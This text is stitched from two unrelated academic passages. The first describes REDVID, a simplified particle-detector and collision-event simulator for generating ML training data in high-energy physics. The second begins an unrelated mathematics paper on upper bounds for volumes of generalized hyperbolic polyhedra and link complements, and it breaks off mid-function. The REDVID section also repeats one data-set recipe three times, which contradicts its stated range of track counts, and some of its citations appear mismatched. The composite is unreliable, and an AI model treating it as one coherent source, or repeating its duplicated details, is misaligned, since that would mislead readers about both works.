of the early designs, before addressing the full real-world case. Solution exploration/design in general, and solutions based on ML models in particular, have always benefited from methodical simplification of the problem at hand. For a system operating over a broad behavioural-space, such a simplification often is manifested by means of high-level modelling. Both actual experiments and physics-accurate simulations for our use-case, i.e., proton-proton/ion-ion collision events inside a detector such as the ATLAS detector, are immensely complex. Dropping of the physics-accurate characteristics results in major behavioural-space reductions. This applies to both the detector model and the behaviour affecting the event simulator. While moving away from physics-accuracy, our aim has been to conserve logical, mathematical and geometrical relations, which would provide the basis for a flexible parameterisation. Preserving relations between interacting elements of a system preserves occurrence of _cascading effects_ when the system is being steered through reconfiguration. For instance, a change in the structural definition of the detector model will affect the recorded hit points during the event simulation. It must be noted that we have intentionally avoided the time dimension complexities. Accordingly, a list of major reductions that we have considered follows. _Simplified detector geometry._ The real detector has a complex geometry, with many small sensors acting collectively to record particle interactions. For instance, a barrel sub-detector type is built using many smaller modules, ultimately forming a cylindrical shape. There are also supporting subsystems, e.g., for cooling, which occupy parts of the detector space. 
We have considered much simpler elements for the geometry of our virtual detector model, consisting of elements with disk or cylinder shapes, ultimately arriving at a Reduced-Order Model (ROM). _Particle types._ The particle type plays a major role in its traversal path through the detector. In fact, as stated in Section 2, one of the major applications of track reconstruction is to assign the particle type. Currently, we consider a single particle type in our event simulator. This characteristic can be expanded in the future. _Simplified tracks._ In the real detector, tracks follow an arc of a helix-like path and not an exact one. This is not the case for all particles, and the charge characteristic of a particle of interest is a defining factor. Currently, we consider particles traversing a straight line. This indirectly suggests that either the single particle type we consider is one with no charge, or alternatively, we do not consider a magnetic field, which is present in the real detector. _Collision points._ The real experiments involve multiple collisions happening almost at the same time. The collision points will not be at the same spot. Even the collision of interest that is intended for track reconstruction will not perfectly align to the detector's origin point. The neighbouring collisions will also pollute the detector readings with particles associated to them. We consider a single event at the origin for our event simulations. _Hit coordinates smearing._ When it comes to instrumentation noise, there is no well-defined grand complication present. The amount of noise in real experiments depends on the characteristics of the sensors and material. We introduce noise in our hit calculations and hit coordinate parameters by drawing random samples from a Gaussian distribution. We also consider the noise standard deviation as proportional to the variable range. Like the rest of REDVID's features, the noise ratio can be adjusted by the user. ### Detector model At its core, a detector model is comprised of the geometric definitions of the included elements, shapes, sizes, and placements in space. Although we can support a variety of detector geometries, the overall structure, especially for our experimental results, is based on the ATLAS detector. Accordingly, there are four sub-detector types, _Pixel, Short-strip, Long-strip_ and _Barrel_. The pixel and the barrel types have cylindrical shapes, with the pixel being a filled cylinder, while the barrel is a cylinder shell with open caps. These are not hard requirements as the geometry is fully parametric and differing definitions can be opted for, e.g., a pixel as a cylinder shell. The long-strip and the short-strip types are primarily intended as flat disks, but can be defined as having a thickness, rendering them as cylinders. Sub-detector types can be selectively present or absent. Figure 3 depicts a representative variation of the detector geometry involving the aforementioned elements. Structurally speaking, in a real-world detector, e.g., the ATLAS detector, the internals of short-strip and long-strip sub-detector types are different. We, on the other hand, reduce such complexities to placement location and size, i.e., distance from the origin and sub-detector disk radius. Note that our geometric model does support disk thickness, which basically would turn disks into shallow cylinders. However, we have considered flat disks for our experiments. 
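To make the above geometry description concrete, the following minimal Python sketch shows one way such a reduced, fully parametric detector model could be captured. It is an illustrative sketch only, not REDVID's actual implementation or API; the class and function names (`DiskLayer`, `BarrelLayer`, `Detector`, `spawn_detector`) are hypothetical, but the quantities they hold (placement along the beam axis, radii, layer counts, layer spacing) follow the description above.

```python
from dataclasses import dataclass, field
from typing import List

# Hypothetical sketch of a reduced, fully parametric detector model.
# Short-strip and long-strip layers are flat disks at a fixed z with a bounded radius;
# barrel layers are cylinder shells at a fixed radius with a bounded z extent.

@dataclass
class DiskLayer:
    z: float       # placement along the beam (Z) axis
    r_min: float   # inner radius (non-zero if the beam pipe is part of the geometry)
    r_max: float   # outer radius

@dataclass
class BarrelLayer:
    r: float       # shell radius
    z_min: float   # extent along the beam axis
    z_max: float

@dataclass
class Detector:
    disks: List[DiskLayer] = field(default_factory=list)
    barrels: List[BarrelLayer] = field(default_factory=list)

def spawn_detector(n_disk_layers: int = 4, first_z: float = 1.0,
                   spacing: float = 0.5, disk_radius: float = 1.0) -> Detector:
    """Spawn a minimal detector with equally spaced disk layers on both sides of the origin."""
    det = Detector()
    for i in range(n_disk_layers):
        z = first_z + i * spacing
        det.disks.append(DiskLayer(z=+z, r_min=0.0, r_max=disk_radius))
        det.disks.append(DiskLayer(z=-z, r_min=0.0, r_max=disk_radius))
    return det
```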
Figure 3. The fully parametric detector geometry, allowing for inclusion/exclusion of different sub-detector types, with full control over sub-layer counts, sizes and placements. Figure 2. An overview of a reduced simulation as part of a ML model design workflow, e.g., a Neural Architecture Search (NAS), by providing the data set. This paper focuses on the area with the yellow fill, covered by our simulation tool, REDVID. ### Particle collision event simulation As mentioned above, one of the simplifications for our complexity reduction approach is to consider a single collision per event, aligning exactly to the origin point of the detector geometry. However, the list of complexities, even without the polluting effects of multiple collisions, is extensive. Particles travelling through the detector matter could lead to secondary collisions, resulting in drastic changes in their trajectory. Such secondary collisions could also lead to the release of particles not originating from the collision event itself. These will show up as tracks with unusual starting points within the detector space, rather distant from the collision point. Some particles could also come to a halt, which would be seen as abruptly terminating tracks. Such physics-accurate complexities of particles interacting with the present matter in detectors are not considered for our simulator. It must be noted that the generation of tracks originating far away from the origin and prematurely terminating tracks can be added to our simulator in a randomised fashion. ## 4. Implementation Though our detector generator and event simulation modules support both two-dimensional (2D) and three-dimensional (3D) spaces, we will focus on the implementation details relevant to the three-dimensional case. Let us simply mention that the main difference between the two would be the presence of circles and cylinders for 2D and 3D spaces, respectively. One can consider the rather simplistic 2D space as a form of sanity check set-up for initial testing of techniques and methodologies of ML-assisted solution workflows. REDVID is open source (Krause et al., 2017) and has been developed in Python. ### Modules Considering the tasks at hand, detector spawning and event simulation, our software can be divided into three main logical modules: * To spawn a detector based on the provided geometric specifics and configuration. * To execute experiments involving many events, following the experiment configuration, e.g., hit probability, number of tracks (fixed/variable), track randomisation protocol, etc. * To collect the expected outputs, i.e., the generated data set, as well as automated report generation on the important configuration and a statistical overview of the data set. An overview diagram of the modules is depicted in Figure 4. The current implementation considers the sequential execution of modules in the order given above. However, one can easily generate detectors without simulating events, or simulate events with previously generated detectors, or even calculate hits based on previously generated tracks. Such input/output capability will allow our software to interact with other commonly utilised tools. The main configuration parameter defining the execution path within our tool is the detector_type, which can be 2D or 3D. ### Coordinate systems For the case of the 3D space, we have opted for the cylindrical coordinate system to represent all elements, i.e., sub-detectors, tracks and hits. 
The cylindrical coordinate system, depicted in Figure 5, is a convenient choice, as we are considering the Z-axis as the beam pipe in LHC experiments and all geometric shapes defined within a detector, whether disks or cylinders, are actually of the type cylinder. The three parameters to define any point in the cylindrical coordinate system are the radial distance from the Z-axis, the azimuthal angle between the X-axis and the radius, and the height of the point from the XY-plane, i.e., \(r\), \(\theta\) and \(z\), respectively. Note that in terms of the orientation of the coordinate system, we consider the Z-axis to be horizontal. With the assumption of the beam pipe's alignment along the Z-axis, this is the most convenient orientation for defining different geometric elements. In this coordinate system, hit points can be precisely defined given the tuple \((r_{hit},\theta_{hit},z_{hit})\). Geometric shapes can also be defined with boundaries for \(r_{sd}\) and \(z_{sd}\), e.g., a disk will have fixed \(z_{sd}\), unbounded \(\theta\) and bounded \(r_{sd}\). Here \(sd\) stands for sub-detector. Our software does support partial disks, i.e., a disk with a hole in the middle, which can be considered when the beam pipe is expected to be part of the geometry. Disks with thickness (cylinders) will have a small boundary for the parameter \(z_{sd}\). As previously explained, short-strip and long-strip sub-detector types are defined as disks. For the pixel type, as it is a filled cylinder, both \(r_{sd}\) and \(z_{sd}\) will be bounded. When it comes to the barrel type, as it is a cylinder shell, there will be a fixed \(r_{sd}\) with bounded \(z_{sd}\). To implement linear tracks and to define them in the cylindrical coordinate system, both a direction vector and a point, \(P_{0}\), that the track (line) goes through are needed. The direction vector, \(V_{d}\), is considered as a vector from the origin, landing on a point in space, represented with a tuple \((r_{d},\theta_{d},z_{d})\). The direction vector is randomised and then normalised for the \(z\) parameter, meaning that the direction vector will either have \(z_{d}=1\) or \(z_{d}=-1\). The boundaries of this randomisation depend on the track randomisation protocol, explained in the next section. Currently, we consider all tracks originating from the detector origin, meaning that the point \((0,0,0)\) is considered on the track. The resulting parametric form of a track (line) is, \[r =t\cdot r_{d}\,,\] \[\theta =\theta_{d}\,,\] \[z =t\cdot z_{d}\,,\] with \((r,\theta,z)\) representing a point on the track and \(t\) being the free variable. ### Track randomisation protocols As seen in Figure 4, the track randomisation step directly affects sub-detector hit calculation and is totally dependent on the randomisation protocol indicated in the configuration. Focusing on the implementation for the 3D space, different track randomisation protocols can be considered. We list four base protocols and five combination protocols, mixing the characteristics of base protocols: _Protocol 1 - Last layer hit guarantee._ Hits are guaranteed to occur on the farthest layer of every sub-detector type, which means the farthest layer of every sub-detector type is the randomisation domain for the landing points of tracks. A hit guarantee on the last layer will also guarantee hits on the previous layers for that sub-detector type. This protocol is designed to maximise the number of hits per sub-detector type within the data set. 
_Protocol 2 - Spherically uniform distribution._ To have a more uniform distribution of randomised tracks, without imposing any geometric conditions, is to have the track end points land on a sphere. Note that tracks do not have actual end points as these are unbounded lines. _Protocol 3 - Conical jet simulation._ Tracks are randomised in distinct subsets, bundled in a close vicinity within a narrow cone, representing a jet(s). This protocol on its own may not be a sensible choice and it would work best in combination with other protocols. _Protocol 4 - Beam pipe concentration._ The tracks will have a higher concentration around the beam pipe, i.e., higher track generation probability as the radius gets smaller. _Protocols 1 and 3._ While still landing on the last sub-detector layer, there are distinct subsets of tracks bundled in a close vicinity as jets. In other words, jets will be mixed with regular tracks. _Protocols 1 and 4._ While still landing on the last sub-detector layer, the tracks landing on the short-strip and the long-strip sub-detector types will have a higher concentration around the beam pipe, i.e., higher track generation probability as the radius gets smaller for these sub-detector types. Tracks landing on the barrel sub-detector type will not be affected. _Protocols 2 and 3._ While still having uniformly distributed tracks landing on a sphere, there will be uniformly distributed distinct subsets of tracks bundled in a close vicinity as jets. _Protocols 3 and 4._ The tracks will have a higher concentration around the beam pipe, i.e., higher track generation probability as the radius gets smaller. There will be jet formation also with higher probability of occurring around the beam pipe. _Protocols 1, 3 and 4._ This combination is the same as the previous, protocols 3 and 4, with the additional condition that the tracks are guaranteed to land on the last layer per sub-detector type. Note that for our data generation we have only considered protocol 1 to increase recorded hit points for all tracks and to have hit points for all sub-detector types. Needless to say, additional track randomisation protocols focusing on specific corner cases, can be easily defined and added to the tool. To implement protocol 1, i.e., to guarantee that tracks land on the last layer of a sub-detector type, we consider the coordinate domain of the last layer as the randomisation domain for track direction vectors. Thus, before normalisation, all randomised \(V_{d}\) will land on the last layer. As it can be deduced from the above protocol descriptions, not every combination is allowed, as some of the base protocols are mutually exclusive. For instance, protocols 1 and 2 cannot be applied at the same time, as it is self-evident that a spherical uniform distribution and a last layer hit guarantee cannot be true at the same time. Accordingly, we can consider the base protocols within two main categories, _distribution protocols_, affecting how tracks are distributed in space, and _feature protocols_, defining special forms of localised distribution. Currently, protocol 3 is the only feature protocol defined. While feature protocols can be combined with any distribution protocol, most distribution protocols are mutually exclusive. A combination of two or more base distribution protocols will also lead to another, more specific, distribution protocol, e.g., protocols 1 and 4. The diagram in Figure 6 provides a visual overview of different protocol combinations. 
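To make the linear track model and a protocol-1-style randomisation concrete, the sketch below generates a randomised track whose landing point is drawn on the farthest disk layer, evaluates the parametric equations \(r=t\cdot r_{d}\), \(\theta=\theta_{d}\), \(z=t\cdot z_{d}\), and records a smeared hit on a disk at a given \(z_{sd}\). This is an illustrative approximation under the conventions described above (direction vectors normalised to \(z_{d}=\pm 1\), tracks through the origin, Gaussian smearing proportional to the variable range), not REDVID's actual code; all function names, and the choice of a uniform-over-the-disk landing distribution, are ours.

```python
import math
import random

def random_track_last_layer(last_layer_z: float, last_layer_r: float):
    """Protocol-1-style randomisation: the landing point is drawn on the farthest disk layer."""
    side = random.choice((+1.0, -1.0))                   # which side of the XY-plane
    r_land = last_layer_r * math.sqrt(random.random())   # one possible choice: uniform over the disk area
    theta = random.uniform(0.0, 2.0 * math.pi)
    # Direction vector (r_d, theta_d, z_d), normalised so that z_d = +1 or -1.
    return (r_land / last_layer_z, theta, side)

def track_point(direction, t: float):
    """Evaluate the parametric track equations r = t*r_d, theta = theta_d, z = t*z_d."""
    r_d, theta_d, z_d = direction
    return (t * r_d, theta_d, t * z_d)

def hit_on_disk(direction, z_sd: float, noise_ratio: float = 0.0, r_max: float = 1.0):
    """Intersect a track from the origin with a flat disk layer at z = z_sd (matching signs assumed)."""
    r_d, theta_d, z_d = direction
    t_sd = z_sd / z_d                                    # z_d is +1 or -1, so t_sd > 0 when signs match
    r_hit, theta_hit, z_hit = t_sd * r_d, theta_d, z_sd
    if noise_ratio > 0.0:                                # smearing proportional to the variable range
        r_hit += random.gauss(0.0, noise_ratio * r_max)
        theta_hit += random.gauss(0.0, noise_ratio * 2.0 * math.pi)
    return (r_hit, theta_hit, z_hit)

direction = random_track_last_layer(last_layer_z=3.0, last_layer_r=1.0)
print(track_point(direction, 1.0))
print(hit_on_disk(direction, z_sd=math.copysign(1.5, direction[2]), noise_ratio=0.01))
```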
Figure 4. An overview of the REDVID modules, including a detector model generator, an event simulator, generating randomised tracks and calculating sub-detector hit points based on tracks and geometric data, as well as different reporting elements. Figure 5. Basic definition and parameters of the cylindrical coordinate system, radial distance, azimuthal, height (\(r\), \(\theta\), \(z\)), which is the basis of our geometric structures. ### Hit point calculation Regarding hit point coordinates, i.e., \((r_{hit},\theta_{hit},z_{hit})\), depending on the sub-detector shape, we are dealing with either a fixed \(z_{sd}\) or a fixed \(r_{sd}\), for disks and barrels, respectively. Here, we consider the disks as being flat and to have no thickness, while the barrels consist only of cylinder shells, with no thickness. Shapes with thickness are supported, for which the techniques involved will be similar. Considering the set of track equations, we are to calculate the free variable \(t\) at the sub-detector layer of interest. This specific \(t\) is denoted as \(t_{sd}\), i.e., \(t\) at sub-detector. For hit coordinates at disks, \[z_{hit} =z_{sd}\,,\] \[\theta_{hit} =\theta_{d}\,,\] \[t_{sd} =\frac{z_{sd}}{z_{d}}=\frac{z_{sd}}{1}\,,\] \[\Rightarrow t_{sd}=z_{sd}\,,\] \[r_{hit} =t_{sd}\cdot r_{d}=z_{sd}\cdot r_{d}\,.\] Note that in the above calculation \(z_{d}\) and \(z_{sd}\) must have matching signs, rendering \(t_{sd}>0\). In other words, tracks extruding towards the positive or the negative side of the \(Z\)-axis can hit sub-detector layers present at the positive or the negative side of the \(Z\)-axis, respectively. We also know that \(z_{d}\neq 0\). A similar calculation considering the \(r_{sd}\) as fixed will result in the hit coordinates for a barrel sub-detector layer, which we will not repeat here. ### Available configuration We have pointed out a few important configuration options in Figure 4, i.e., geometry options as a whole, track randomisation and options related to sensing and smearing probabilities when recording hits. Looking at the available options in further detail, REDVID is highly _(re)configurable_. _3D geometry options._ It is possible to set the detector ID2, the coordinates for the origin and the centre of each element, the presence of different sub-detector types, thick or flat structure, span over the radius and the \(z\) parameters including inner and outer radii, sub-layer counts per sub-detector type, and the distance between consecutive sub-layers per sub-detector type. Spawned detector geometries can be saved for future use. Footnote 2: The detector ID can be set to auto-generate as well. _Experiment options._ It is possible to set the experiment name, hit coordinate smearing (noise generation), event count, fixed or variable track count with minimum and maximum bounds for the latter, track randomisation protocol, and hit occurrence probability. _Generic execution options._ A complete folder structure is constructed, only requiring an anchor path to be configured. _Non-determinism invoking options._ Though it is desirable to reduce the behavioural-space, as we have done extensively, it is of utmost importance not to arrive at a deterministic simulation. 
In REDVID, we invoke non-determinism in the simulated behaviour by allowing different randomisations per event, i.e., mandatory randomisation of track parameters, optional track count randomisation, optional introduction of smearing for hit point parameters (noise), and optional hit point occurrence (recording) probability. Resulting from the modular design, different intermediate data input/output points can be arranged, allowing REDVID to interact with other available tooling. For instance, track data generated by external Monte Carlo event generators can be used alongside a spawned detector geometry to calculate hit points. Needless to say, the input data has to be in a format compatible with REDVID. ## 5. Data set generation We have considered a number of workloads consisting of both detector spawning and event simulation tasks. We have followed simulation recipes with 10 000 events, and varying track counts, [1, 10 000] per event for each experiment, listed below. Hit recording is performed with smearing enabled and the detector geometry is the same for all recipes. These generated data sets are intended as reference for physicists and data scientists alike and are publicly accessible over Zenodo open repository [(20)]. * 10 000 events, 1 track per event, hit coordinate smearing enabled * 10 000 events, 10 tracks per event, hit coordinate smearing enabled * 10 000 events, 10 tracks per event, hit coordinate smearing enabled * 10 000 events, 10 tracks per event, hit coordinate smearing enabled Figure 6. Visualising how different base distribution and feature protocols can be combined to achieve more complex track randomisation behaviour. ### Data set schema Considering that all of the above data sets are for the 3D domain, the schema and relevant elaborations for the generated data are listed below. * An incremental identifier for events belonging to an experiment, which is unique within the scope of the experiment. * An incremental identifier for different sub-detector layers belonging to a geometry, which is unique within the scope of the geometry. * The type of the sub-detector layer recording a hit, which can be one of three available types, pixel, short-strip, or long-strip. * An incremental identifier for tracks belonging to an event, which is unique within the scope of the event. * Indicates the type of function defining the track in terms of polynomial degree. At the moment, all tracks are linear. * The \(r\) coordinate of the \((r_{0},\theta_{0},z_{0})\) tuple defining the point \(P_{0}\), used in a track's parametric set of equations. This value is currently zero. * The \(\theta\) coordinate of the \((r_{0},\theta_{0},z_{0})\) tuple defining the point \(P_{0}\), used in a track's parametric set of equations. This value is currently zero. * The \(z\) coordinate of the \((r_{0},\theta_{0},z_{0})\) tuple defining the point \(P_{0}\), used in a track's parametric set of equations. This value is currently zero. * The \(r\) coordinate of the \((r_{d},\theta_{d},z_{d})\) tuple defining the direction vector \(V_{d}\), used in a track's parametric set of equations. * The \(\theta\) coordinate of the \((r_{d},\theta_{d},z_{d})\) tuple defining the direction vector \(V_{d}\), used in a track's parametric set of equations. * The \(z\) coordinate of the \((r_{d},\theta_{d},z_{d})\) tuple defining the direction vector \(V_{d}\), used in a track's parametric set of equations. This value will be \(1\) or \(-1\), depending on which side of the XY-plane the track is being extruded from. 
* An incremental identifier for hits belonging to an event, which is unique within the scope of the event. * The \(r\) coordinate of the \((r_{hit},\theta_{hit},z_{hit})\) tuple defining the recorded hit point on the relevant sub-detector. * The \(\theta\) coordinate of the \((r_{hit},\theta_{hit},z_{hit})\) tuple defining the recorded hit point on the relevant sub-detector. * The \(z\) coordinate of the \((r_{hit},\theta_{hit},z_{hit})\) tuple defining the recorded hit point on the relevant sub-detector. ### Performance benchmarking In order to evaluate the performance of REDVID, we have benchmarked the execution of simulations with a lower event count, 1 000 events per simulation and similar variations of track concentrations per event as before, i.e., \([1,10\,000]\). For our metric collections, including CPU-time and execution duration, high-precision counters from the time library available in Python have been used. The collected CPU-time results are provided in Table 1. Simulations have been performed on the DAS-6 compute cluster (Brandt et al., 2017). The machines used are each equipped with a single 24-core AMD EPYC 7402P processor and 128 GB of main memory. Note that the mean CPU-time calculations do not include the first event of each recipe batch. This is due to the presence of the cold-start effect for the first event and delays resulting from it. Though we have enforced single-threaded operation for our benchmarks, workload parallelisation is rather trivial. The number of events to be generated can be divided into any desired number of batches and distributed amongst multiple threads. Considering the timing results, we observe that the CPU-time values scale linearly, i.e., a tenfold increase in the track concentration per event results in roughly a tenfold increase in the full simulation CPU-time. ### User operation Whether independently, or as an integrated module within a workflow, similar to the depiction from Figure 2, users can use REDVID primarily to generate data sets. The main script to execute the tool is digital_detector.py (Garay et al., 2017). A configuration file is included and populated with parameter values. Users only have to change the anchor_path parameter to a valid path. This will be system dependent. Alternatively, a different configuration file path can be provided as an argument. The default name is REDVID_config.ini, which can also be changed. Python package dependencies are minimal and can be observed in the requirements file. ## 6. Related Work Although the overall available data is abundant, corner case data is rather scarce. Such real-world data, or data synthesised with accurate (in our case physics-accurate) simulations, is complex in terms of data dimensionality and granularity. This complexity is directly resulting from the complexity of the real system, or the accurate (physics-accurate) model of the system in case of simulations. Within the HEP landscape for instance, we touched upon the complexity of simulators such as Geant4 in Section 2, as well as the dependence on these simulators by tools like ATLFAST. The first challenge, lack of annotated data for one or more specific scenarios, has been recognised in the literature (Garay et al., 2017). The second challenge though, the issue of complexity, is not as well known. A closely related acknowledgement has been made regarding the complexity level of models for simulations (Garay et al., 2017). 
The two main shortcomings of the previous efforts towards the use of ML in physics problems have been use-case specificity (Willard et al., 2017) and the lack of user-friendly tools (Brandt et al., 2017). As noted by Willard et al. (Willard et al., 2017), the efforts surrounding the use of ML for physics-specific problems are focused on sub-topics, or even use-cases. Although our methodology and synthetic data focus on the domain of tracking for detector data, we could claim that they are independent of the chosen detector experiment. The point from (Willard et al., 2017) regarding the computational efficiency of ROMs matches our motivation. Where our work differs is in the placement of our ROM within our methodology. Our reduced model of a detector is considered as the model for simulations resulting in synthetic data generation, which is different from ML-based surrogate models as ROMs (Brandt et al., 2017; Garay et al., 2017), or ML-based surrogate models built from ROMs (Willard et al., 2017). ## 7. Conclusion and Future Work We have argued why there is a need for reduced complexity simulations when designing ML-assisted solutions. We pointed out how a reduction in simulation complexity through ROMs and a smaller behavioural-space for the simulator will result in a lower complexity for synthesised data. This is particularly the case for our HEP use-case. We have described the design and implementation details of our simulation framework fulfilling such a reduction, the REDuced Virtual Detector (REDVID). We have provided computational cost figures for REDVID with example workload recipes and have made available the resulting data sets over Zenodo open repository. Even though our tool is developed in Python, computational cost figures (case in point, 15 seconds, 138 seconds and 22 minutes of CPU-time for 1 000 events with 10, 100 and 1 000 tracks per event, respectively) indicate efficiency for frequent executions. Accordingly, the light-weight nature of REDVID simulations makes our tool a suitable choice as a simulation-in-the-loop with data-driven workflows for HEP. One major example is the case of searching for a ML-assisted solution, addressing the challenge of particle track reconstruction. However, reduced complexity and less descriptive data distance our simulations from the physics-accurate ground truth. We have explained that to opt for such an approximation is a deliberate act, positioning REDVID as a suitable middle ground amongst other available tools, not as exact as physics-accurate simulations and not as synthetic as dummy data generators. The reduced complexity especially allows for problem formulation and testing at early stages, when dealing with ML-assisted solution design workflows. Yet another advantage of reduced complexity data that still respects the high-level relations is in its pedagogical merit, enabling problem solving practices in higher education. _Future work._ While keeping the distance from physics-accurate tools, REDVID can be extended in numerous ways. Considering our foreseen methodology, we will be implementing further low-cost, complexity inducing features, e.g., various track randomisation protocols to allow for diverse particle propagation scenarios, complex non-linear track definitions, origin smearing, and possibly a Domain-Specific Language (DSL) to be used for virtual detector definitions. 
Aside from REDVID itself, we intend to implement the full ML-assisted solution search workflow depicted in Figure 2 and perform explorations of models based on different ML architectures. ## Acknowledgments This project is supported by the Nederlandse Organisatie voor Wetenschappelijk Onderzoek (NWO), a.k.a., the Dutch Research Council.
2307.04543
Upper bounds for volumes of generalized hyperbolic polyhedra and hyperbolic links
A polyhedron in a three-dimensional hyperbolic space is said to be generalized if finite, ideal and truncated vertices are admitted. By virtue of Belletti's theorem (2021), the exact upper bound for volumes of generalized hyperbolic polyhedra with the same one-dimensional skeleton $G$ is equal to the volume of an ideal right-angled hyperbolic polyhedron whose one-dimensional skeleton is the medial graph for $G$. In the present paper we give upper bounds for the volume of an arbitrary generalized hyperbolic polyhedron, where the bounds linearly depend on the number of edges. Moreover, it is shown that the bounds can be improved if the polyhedron has triangular faces and trivalent vertices. As an application, new upper bounds are obtained for the volume of the complement of a hyperbolic link having more than eight twists in its diagram.
Andrey Egorov, Andrei Vesnin
2023-07-10T13:20:21Z
http://arxiv.org/abs/2307.04543v1
# Upper bounds for volumes of generalized hyperbolic polyhedra and hyperbolic links ###### Abstract. A polyhedron in a three-dimensional hyperbolic space is said to be generalized if finite, ideal and truncated vertices are admitted. By virtue of Belletti's theorem (2021), the exact upper bound for volumes of generalized hyperbolic polyhedra with the same one-dimensional skeleton \(G\) is equal to the volume of an ideal right-angled hyperbolic polyhedron whose one-dimensional skeleton is the medial graph for \(G\). In the present paper we give upper bounds for the volume of an arbitrary generalized hyperbolic polyhedron, where the bounds linearly depend on the number of edges. Moreover, it is shown that the bounds can be improved if the polyhedron has triangular faces and trivalent vertices. As an application, new upper bounds are obtained for the volume of the complement of a hyperbolic link having more than eight twists in its diagram. Key words and phrases: hyperbolic space, volumes of hyperbolic polyhedra, hyperbolic knots and links, augmented links 2000 Mathematics Subject Classification: 52B10, 51M10, 57M25 The authors were supported by the Theoretical Physics and Mathematics Advancement Foundation "BASIS". A.V. was also supported by the state contract of the Sobolev Institute of Mathematics (project no. FWNF-2022-0004). If a polyhedron is an ideal right-angled hyperbolic polyhedron, then each of its vertices is 4-valent, i.e. incident to exactly four edges. Calculation of the volume of a hyperbolic polyhedron given by its combinatorics and dihedral angles is a rather difficult problem. A solution of this problem for a particular family of tetrahedra goes back to Lobachevsky. Some modern results and methods related to the problem are presented in works of Milnor [30], Kellerhals [24], Vinberg [40], Kashaev [22], Cho and Kim [13], Murakami and Yano [31], where polyhedra with finite, ideal, or truncated vertices were under consideration. Moreover, for some classes of hyperbolic polyhedra of fixed combinatorics, such as simplexes and pyramids, there are known volume bounds depending on the number of vertices or edges. Due to the Mostow rigidity theorem, calculations of volumes and volume bounds have straightforward applications in the theory of hyperbolic 3-manifolds and in knot theory [38]. Below in the formulae for the volumes of three-dimensional hyperbolic polyhedra and manifolds we will use the _Lobachevsky function_ introduced by Milnor in [30], \[\Lambda(\theta)=-\int\limits_{0}^{\theta}\log|2\sin(t)|\,\mathrm{d}t.\] To formulate results on upper and lower volume bounds the two constants will be used which have the following values with an accuracy of up to six digits: \[v_{tet}=3\Lambda(\pi/3)=1.014941\quad\text{and}\qquad v_{oct}=8\Lambda(\pi/4)=3.663863.\] Approximate numerical values of quantities expressed in terms of the Lobachevsky function will be given with the same accuracy up to six digits. In the present paper we will give the upper bounds for the volume of generalized hyperbolic polyhedra, where the bounds linearly depend on the number of edges. In Section 2 we recall the definition of a generalized hyperbolic polyhedron. It was shown by Belletti in [11] that the maximum volume of generalized hyperbolic polyhedra with the same 1-skeleton is achieved on the corresponding ideal right-angled hyperbolic polyhedron, see Theorem 2.1. Bounds for the volumes of ideal right-angled hyperbolic polyhedra in terms of the number of vertices were previously obtained in [5, 8, 18, 19]. 
Based on these results, in Theorem 2.2 we obtain the upper bounds for the volumes of generalized hyperbolic polyhedra given as a linear function of the number of edges. **Theorem 2.2**.: _Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is a 1-skeleton. Then the following inequalities hold._ * _If_ \(P\) _is a tetrahedron, then_ \(\operatorname{vol}(P)\leq v_{oct}\)_._ * _If_ \(P\) _is not a tetrahedron, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-\frac{5v_{oct}}{2}.\] * _If_ \(E>24\)_, then_ \[\operatorname{vol}(P)\leq\frac{v_{oct}}{2}\cdot E-3v_{oct}.\] Section 3 deals with the case when there is additional information about the combinatorics of a generalized polyhedron. Namely, in Theorem 3.4 the upper bounds for volumes are obtained by taking into account the number of triangular faces and trivalent vertices of the polyhedron. **Theorem 3.4.**_Let \(\Gamma\) be a 3-connected planar graph with \(E\) edges, and \(P\) be a generalized hyperbolic polyhedron for which \(\Gamma\) is the 1-skeleton._ 1. _If_ \(P\) _has_ \(V_{3}\) _trivalent vertices and_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant 2v_{tet}\cdot\left(E-\frac{p_{3}+V_{3}+8}{4}\right).\] 2. _If all vertices of_ \(P\) _are trivalent and there are_ \(p_{3}\) _triangular faces, then_ \[\operatorname{vol}(P)\leqslant\frac{5v_{tet}}{3}\left(E-\frac{3p_{3}+24}{10}\right).\] In Section 4 we provide examples of applying bounds from Theorems 2.2 and 3.4 to three infinite families of generalized hyperbolic polyhedra: pyramids, prisms and pyramids with two apexes. In Section 5 we present the relationship between the volumes of hyperbolic polyhedra and bounds for the volumes of hyperbolic knots and links via the number of twists in their diagrams. Relations of such type were previously discussed in [4, 16, 28, 34]. In Theorem 5.1 we obtain an upper bound for the volumes of hyperbolic knots and links with the number of twists in the diagram greater than eight. **Theorem 5.1.**_Let \(D\) be a hyperbolic diagram of a link \(K\) with \(t(D)\) twists. If \(t(D)>8\), then_ \[\operatorname{vol}\left(S^{3}\setminus K\right)\leq 10v_{tet}\cdot(t(D)-1.4).\] Finally, we demonstrate that the bound from Theorem 5.1 improves the previously known bounds. ## 2. Volume of a generalized hyperbolic polyhedron To define a generalized hyperbolic polyhedron we will use a projective model of a hyperbolic space and follow [10, 11, 38, 39]. Consider the symmetric bilinear form defined on \(\mathbb{R}^{4}\) as \[\langle\mathbf{x},\mathbf{y}\rangle=-x_{0}y_{0}+x_{1}y_{1}+x_{2}y_{2}+x_{3}y_{3}.\] With the standard embedding of \(\mathbb{R}^{3}\) in \(\mathbb{RP}^{3}\), which maps the point \((x_{1},x_{2},x_{3})\in\mathbb{R}^{3}\) to the point in \(\mathbb{RP}^{3}\) with homogeneous coordinates \((1,x_{1},x_{2},x_{3})\), the subset \(\mathbb{H}^{3}\) corresponds to the open unit ball in \(\mathbb{R}^{3}\). At the same time, geodesics in \(\mathbb{H}^{3}\) are intersections of \(\mathbb{H}^{3}\) with projective lines from \(\mathbb{RP}^{3}\) or, equivalently, with lines from \(\mathbb{R}^{3}\subset\mathbb{RP}^{3}\). Similarly, the (totally geodesic) hyperbolic planes in \(\mathbb{H}^{3}\) correspond to nonempty intersections of \(\mathbb{H}^{3}\) and projective planes from \(\mathbb{RP}^{3}\), or equivalently, with affine planes from \(\mathbb{R}^{3}\). 
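To make the projective (Klein) model computations concrete, the short sketch below classifies a vertex given in \(\mathbb{R}^{3}\) as finite, ideal or hyperideal from the sign of \(\langle\mathbf{x},\mathbf{x}\rangle\) for its homogeneous coordinates \((1,x_{1},x_{2},x_{3})\). This is an illustrative aid only and is not taken from [11] or the present paper; the function names are ours.

```python
import math

def minkowski_form(x, y):
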